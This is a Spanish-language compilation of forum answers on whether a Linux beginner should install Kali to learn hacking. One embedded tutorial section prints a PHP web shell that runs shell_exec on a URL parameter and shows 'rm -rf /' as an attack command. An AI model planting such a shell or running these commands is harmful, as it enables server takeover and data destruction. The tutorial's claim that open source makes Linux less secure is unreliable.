Nunca usé Linux, y quiero comenzar a aprender sobre piratería y seguridad. ¿Debo instalar Kali Linux?

Linux proporciona una gran plataforma para el aprendizaje. Sin embargo, hay diferentes versiones / distribuciones, llamadas con cariño como distros-, gnome, kde, kali, etc.

No es una necesidad absoluta que uno necesite ser un usuario de Linux para aprender sobre seguridad informática. Verifique esto: (¡Adrian Lamo es un nombre famoso entre la comunidad cibernética!)
¿Qué sistema operativo usa Adrian Lamo?

Un usuario de Linux todavía puede aprender mucho y una inversión en aprendizaje nunca sufre.

Kali Linux ofrece características destinadas a un nivel avanzado de usuarios. Por lo tanto, instale primero una distribución amigable (si tiene un CD de instalación, pruébelo primero) Diga Ubuntu, infórmese al respecto.
También puede intentar usar FEDORA primero como lo sugiere Eugene Taradayko
en los comentarios a esta respuesta.

Además, puede unirse a un MOOC sobre “ciberseguridad y aplicaciones” para tener una idea fundamental sobre el mismo.
Una vez que conozca bien el entorno Linux, puede pasar a otros. ¡Explore las posibilidades!

Lo que también necesita saber para saber es:
EL HACKING NO PUEDE SER ENSEÑADO,
SOLO SE PUEDE “APRENDER”
Es una habilidad que se adquiere y, aunque no sé mucho sobre piratería, estoy bastante seguro de que un experto en ciberseguridad se basa en toneladas de experiencia, intuición e inteligencia adquirida.


¡Feliz aprendizaje y todo lo mejor!

Hackear sistemas Linux

Linux es el sistema operativo de servidor más utilizado especialmente para servidores web. Es de código abierto; Esto significa que cualquiera puede tener acceso al código fuente. Esto lo hace menos seguro en comparación con otros sistemas operativos, ya que los atacantes pueden estudiar el código fuente para encontrar vulnerabilidades . Linux Hacking se trata de explotar estas vulnerabilidades para obtener acceso no autorizado a un sistema.

En este artículo, le presentaremos qué es Linux, sus vulnerabilidades de seguridad y las medidas de contador que puede implementar.

Nota rápida sobre Linux

Linux es un sistema operativo de código abierto . Hay muchas distribuciones de sistemas operativos basados ​​en Linux, como Redhat, Fedora y Ubuntu, etc. A diferencia de otros sistemas operativos, Linux es menos seguro cuando se trata de seguridad. Esto se debe a que el código fuente está disponible libremente, por lo que es fácil estudiarlo en busca de vulnerabilidades y explotarlo en comparación con otros sistemas operativos que no son de código abierto. Linux puede usarse como servidor, computadora de escritorio, tableta o sistema operativo de dispositivo móvil.

Los programas de Linux se pueden operar utilizando GUI o comandos. Los comandos son más efectivos y eficientes en comparación con el uso de la GUI. Por esta razón, ayuda conocer los comandos básicos de Linux.

Herramientas de pirateo de Linux

  • Nessus : esta herramienta se puede usar para escanear ajustes de configuración, parches, redes, etc., se puede encontrar en https://www.tenable.com/products/…
  • NMap. Esta herramienta se puede usar para monitorear hosts que se ejecutan en el servidor y los servicios que están utilizando. También se puede usar para buscar puertos. Se puede encontrar en http://nmap.org/
  • SARA – SARA es el acrónimo de Asistente de Investigación del Auditor de Seguridad. Como su nombre lo indica, esta herramienta se puede usar para auditar redes contra amenazas como sql Injection, XSS, etc. Se puede encontrar en http://www-arc.com/sara/sara.html

La lista de arriba no es exhaustiva; te da una idea de las herramientas disponibles para hackear sistemas Linux.

Cómo prevenir hacks de Linux

La piratería de Linux aprovecha las vulnerabilidades en el sistema operativo. Una organización puede adoptar la siguiente política para protegerse contra tales ataques.

  • Administración de parches: los parches corrigen errores que los atacantes explotan para comprometer un sistema. Una buena política de administración de parches garantizará que aplique constantemente parches relevantes a su sistema.
  • Configuración adecuada del sistema operativo : otras vulnerabilidades aprovechan las debilidades en la configuración del servidor. Los nombres de usuario inactivos y los demonios deben estar deshabilitados. Se deben cambiar las configuraciones predeterminadas, como las contraseñas comunes de la aplicación, los nombres de usuario predeterminados y algunos números de puerto.
  • Sistema de detección de intrusiones : estas herramientas se pueden utilizar para detectar el acceso no autorizado al sistema. Algunas herramientas tienen la capacidad de detectar y prevenir tales ataques.

Actividad de piratería: piratee un sistema Linux usando PHP

En este escenario práctico, le proporcionaremos información básica sobre cómo puede usar PHP para comprometer un Linux. No vamos a apuntar a ninguna víctima. Si desea probarlo, puede instalar LAMPP en su máquina local.

PHP viene con dos funciones que se pueden usar para ejecutar comandos de Linux. Tiene funciones exec () y shell_exec (). La función exec () devuelve la última línea de la salida del comando mientras que shell_exec () devuelve el resultado completo del comando como una cadena.

Para fines de demostración, supongamos que los administradores del atacante cargan el siguiente archivo en un servidor web.

?

1

2

3

4 4

5 5

6 6

7 7

8

9 9

10

11

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd";

$output = shell_exec($cmd);

echo "

$output

";

?>

AQUÍ,

El script anterior obtiene el comando de la variable GET llamada cmd. El comando se ejecuta utilizando shell_exec () y los resultados se devuelven en el navegador.

El código anterior se puede explotar usando la siguiente URL

http: //localhost/cp/konsole.php ? ...

AQUÍ,

  • "... konsole.php? Cmd = ls% 20-l" asigna el valor ls –l a la variable cmd .

El comando ejecutado contra el servidor será

shell_exec ('ls -l');

La ejecución del código anterior en un servidor web proporciona resultados similares a los siguientes.

El comando anterior simplemente muestra los archivos en el directorio actual y los permisos

Supongamos que el atacante pasa el siguiente comando

rm -rf /

AQUÍ,

  • "Rm" elimina los archivos
  • "Rf" hace que el comando rm se ejecute en modo recursivo. Eliminar todas las carpetas y archivos
  • "/" Indica al comando que comience a eliminar archivos del directorio raíz

La URL de ataque se vería así

http: //localhost/cp/konsole.php ? ...

Resumen

  • Linux es un sistema operativo popular para servidores, computadoras de escritorio, tabletas y dispositivos móviles.
  • Linux es de código abierto y cualquiera puede obtener el código fuente. Esto facilita detectar las vulnerabilidades.
  • Los comandos básicos y de red son valiosos para los hackers de Linux.
  • Las vulnerabilidades son debilidades que pueden explotarse para comprometer un sistema.
  • Una buena seguridad puede ayudar a proteger un sistema de ser atacado por un atacante.

Nadie se convierte en un pirata informático simplemente instalando algo como Kali, IMO Kali es para script kiddies. Un verdadero hacker no depende de ninguna herramienta. El hackerismo es una cultura.

Si está interesado en la seguridad:

  1. Instale una distribución razonable y bien soportada de GNU / Linux. – Como Ubuntu.
  2. Comience aprendiendo principios importantes. – Por ejemplo: cómo funciona realmente Computadoras / Red.

PD: ¡Ten en cuenta que un Hacker difiere en muchos aspectos de un Cracker! 😉 más información: Cómo convertirse en un hacker por Eric S. Raymond .

¡Buena suerte! 🙂

Mi primera distribución de Linux que aprendí fue Backtrack 5r2, no puedo decir cuántas veces he “roto el sistema” tratando de usar Backtrack / Kali como sistema operativo principal y alternar de Linux a Windows, incluso el arranque dual solo funciona Volver a un sistema operativo Windows. No puedo decirte cuántas veces me he esforzado por abandonar la idea de usar Backtrack / kali y busqué otras Distro con herramientas Kali basadas en la compatibilidad del hardware del portátil. Sigo volviendo a Kali. Ahora es un sistema operativo hogareño para mí. Tengo artilugios geniales como todos los probadores de bolígrafos tienen como patitos de goma a RTL-SDR incluso mini-placas arduino. Hoy vivo aliento y hago todo en Kali, incluso uso virtual box para Windows si necesito probar algo virtualmente. Aprender Kali no es algo que se pueda hacer de la noche a la mañana, y todavía estoy aprendiendo después de todos estos años. Al igual que con cualquier cosa para convertirse en experto, lleva años de práctica y aprendizaje una vez que haya adquirido el hardware para probar. Muchas de las vulnerabilidades con WIFI y otros errores se han anhelado desde la revisión. He dejado el Wincrap de forma permanente desde 2015 y he sido instalador de Linux a tiempo parcial desde 2012, tengo una carrera como ingeniero de sistemas Linux. Obtuve las certificaciones Linux + y LPIC-1,2 y gano más dinero que si fuera un profesional certificado por Microsoft. La conclusión es que si te apasiona aprender esto, considera a Kali como una caja de herramientas, como si fueras a reparar un automóvil o reparar un televisor. Muchas de las herramientas que uso no están incluidas en Kali, como el SDK de Android y fastboot para teléfonos raíz y Xfreerdp para conectarse al escritorio remoto de Windows. Estas son todas las herramientas del mercado de accesorios para instalaciones que se encuentran en el sistema respiratorio rodante. Me gusta Debian / Kali, ya que es el único sistema operativo que tiene una cuenta de root habilitada después de la instalación, tiene una gran caja de herramientas preinstalada, sin embargo, rara vez estoy en la raíz como Sudo o SU el terminal si necesito el acceso de root. Aprendí a editar el archivo bash.rc para solucionar mis problemas de sonido alsamixer y uso programas como WPS para editar documentos de Word y Excel y puedo vivir totalmente sin MS Office. Ya no rompo el sistema si modifico algo.

Como consejo, lo primero que hago después de instalar Kali es hacer que se vea como una distribución Debian y eliminar todos los logotipos del dragón Kali de Grub al fondo de pantalla / fondo y tema, no quiero que nadie se dé cuenta de que estoy usando Kali si y cuando me da un poco de curiosidad Si tratas a Kali como Debian, llegarás lejos en la comunidad de Linux.

Sí, instale Kali Linux.

Pero si no comienza en otro lugar, prepárese para estar muy confundido y tomarse mucho tiempo solo tratando de descubrir cómo hacer realmente algo. Así que, por supuesto, instale Kali Linux, pero también instale otras cosas para el aprendizaje real para que Kali finalmente tenga sentido.

Sugiero comenzar con la última versión de Linux Mint que se ejecuta en su equipo actual. Úselo como una introducción a Linux y como un primer reemplazo probable para lo que sea que esté usando ahora. (¿Windows?) En un tiempo relativamente corto, podrá pasar a Ubuntu, Debian, Fedora o incluso FreeBSD.

Para entonces, estarás razonablemente familiarizado con “Linux”.

Pero tenga en cuenta que “Linux” no tiene nada que ver esencialmente con “piratería”, “prueba de lápiz” ni nada más relacionado con su objetivo final aparente. Linux es prominente realmente por dos razones. Primero, es gratis. Y segundo, el código fuente está disponible. A partir de esos dos elementos, se han creado muchas herramientas para que ahora se pueda evitar el trabajo básico. Se ha hecho mucho trabajo por ti.

Todo esto podría hacerse usando herramientas en Windows o casi cualquier otro sistema operativo. Y la mayor parte se ha hecho. Es solo que gran parte de eso es patentado y está disponible por un precio.

Por lo tanto, instale Kali tan pronto como lo desee. Solo espere mucho trabajo antes de esperar resultados.

Kali Linux no es una varita mágica.

Es simplemente una distribución de Linux llena de miles de herramientas a mano para análisis forense, pentesting y piratería, pero requieren un conocimiento específico.

Si no tiene idea de Linux, debe comenzar con una distribución más adecuada para los novatos, como Ubuntu o Mint, y luego pasar a Kali.

La mayoría de las herramientas de Kali son de línea de comandos, por lo que solo te frustrarán si ni siquiera sabes cómo ver el contenido de un directorio.

Comience a obtener confianza con la línea de comando primero.

Entonces, ¿estás realmente seguro de que quieres ser un pentester? Si no, puede estar mejor con otras distribuciones como CentOS, para la administración de la red, y Kali sería una pérdida de tiempo para usted.

Linux no es Windows y requiere conocimiento. Si no sabe lo que está haciendo, puede arruinar los sistemas suyos y de otras personas.

Corrección: el sistema UNIX / Linux tiene una magia llamada man (manual).

Si desea saber qué hace un comando, ingrese man y el comando del que desea saber más (por ejemplo: man ls ).

Una alternativa (mientras se admite) es el comando seguido de –help .

Aprenda de eso y sabrá todo lo que necesita sobre Linux, pero tenga en cuenta: necesita trabajar su ** apagado.

Sigo un principio cuando se trata de sistemas similares a UNIX: RTDC (ejecuta el comando maldito).

Esa es la única forma de aprender.

La fruta de bajo perfil está utilizando marcos como Metasploit con códigos de shell prefabricados, exploits, muy bien envueltos. Hay toneladas de videos sobre el uso de Metasploit en youtube (y SecurityTube.net). Sin embargo, un sistema totalmente actualizado probablemente no sería vulnerable a nada de eso.

Escribir su propio shellcode y exploits es mucho más desafiante. ¿Por dónde empezarías?

Podrías intentar explorar los videos completos de exploTube y GDB de SecurityTube. Aunque esto requeriría algunos conocimientos de programación intermedios.

Explotación de desbordamiento de búfer Megaprimer para Linux

securitytube.net

Formato Cadena Vulnerabilidades Megaprimer

securitytube.net

Otra cosa es seguir varios blogs de ingeniería inversa con tutoriales de lo que le interesa (exploits / ingeniería inversa).

Déjame googlear eso por ti

La lectura de los blogs le dará una idea de las habilidades que desea adquirir al ver a otros utilizar sus habilidades para desmontar, analizar y comprender lo que se necesita.

Por lo general, asumen ensamblaje, código C, conocimiento de scripting y paciencia. La mayoría de ellos no habría logrado nada si no fueran lo suficientemente tercos como para seguir intentándolo 🙂

En pocas palabras : Olvídese de los livecds de hackers fáciles y hágalo de la manera difícil (instale y use una distribución real de Linux). Necesitarás la experiencia más adelante de todos modos.

No, obtén un poco de distribución de Linux sin muchas herramientas gráficas para usar tanto como sea posible los demonios y los programas CLI.

https://exploit-exercises.com/

Este es un conjunto de ejercicios de seguridad: desbordamientos de búfer, cadenas de formato, uso después de estar libre, off-by-one, omisión de aslr, etc.

Suscríbase a https://ctftime.org e intente participar en cada competencia, mejorará realmente rápido si está verdaderamente motivado.

Todo lo que necesita es cultivar gdb, ida, x64dbg, qira (gracias geohot), radare2, realelf, hexedit, objdump, nmap, metasploit, etc.

¿Qué tipo de dominio de seguridad le gustaría mejorar más? Es muy vago.